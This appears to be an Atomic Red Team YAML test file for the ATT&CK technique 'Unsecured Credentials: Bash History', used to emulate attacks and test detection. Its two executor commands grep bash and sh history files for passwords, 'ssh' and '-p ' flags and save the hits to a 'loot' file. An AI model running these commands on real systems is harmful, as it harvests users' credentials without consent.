Hare Sudhan
51 lines
1.6 KiB
YAML
51 lines
1.6 KiB
YAML
attack_technique: T1552.003
|
|
display_name: 'Unsecured Credentials: Bash History'
|
|
atomic_tests:
|
|
- name: Search Through Bash History
|
|
auto_generated_guid: 3cfde62b-7c33-4b26-a61e-755d6131c8ce
|
|
description: |
|
|
Search through bash history for specifice commands we want to capture
|
|
supported_platforms:
|
|
- linux
|
|
- macos
|
|
input_arguments:
|
|
output_file:
|
|
description: Path where captured results will be placed
|
|
type: path
|
|
default: ~/loot.txt
|
|
bash_history_grep_args:
|
|
description: grep arguments that filter out specific commands we want to capture
|
|
type: path
|
|
default: -e '-p ' -e 'pass' -e 'ssh'
|
|
bash_history_filename:
|
|
description: Path of the bash history file to capture
|
|
type: path
|
|
default: ~/.bash_history
|
|
executor:
|
|
command: |
|
|
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
|
|
name: sh
|
|
- name: Search Through sh History
|
|
auto_generated_guid: d87d3b94-05b4-40f2-a80f-99864ffa6803
|
|
description: |
|
|
Search through sh history for specifice commands we want to capture
|
|
supported_platforms:
|
|
- linux
|
|
input_arguments:
|
|
output_file:
|
|
description: Path where captured results will be placed
|
|
type: path
|
|
default: ~/loot.txt
|
|
sh_history_grep_args:
|
|
description: grep arguments that filter out specific commands we want to capture
|
|
type: path
|
|
default: -e '-p ' -e 'pass' -e 'ssh'
|
|
sh_history_filename:
|
|
description: Path of the sh history file to capture
|
|
type: path
|
|
default: ~/.history
|
|
executor:
|
|
command: |
|
|
cat #{sh_history_filename} | grep #{sh_history_grep_args} > #{output_file}
|
|
name: sh
|